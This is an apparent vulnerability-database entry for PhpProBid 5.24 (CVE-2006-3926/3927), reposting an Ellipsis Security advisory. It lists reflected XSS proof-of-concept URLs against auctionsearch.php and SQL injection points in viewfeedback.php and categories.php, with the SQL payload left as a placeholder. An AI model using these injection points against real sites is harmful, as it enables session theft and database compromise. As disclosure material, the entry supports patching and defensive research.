Phpprobid <= 5.24 XSS SQL injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053167 漏洞类型
发布时间 2006-08-01 更新时间 2006-08-01
CVE编号 CVE-2006-3927
CVE-2006-3926
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080007
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Phpprobid 5.24
http://www.phpprobid.com
--------------------------
Cross Site Scripting (XSS)
--------------------------
http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script>
http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>
-------------
SQL injection
-------------
http://target.xx/viewfeedback.php?view=1'[SQL]
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]
http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]
-----------------
Ellipsis Security
http://www.ellsec.org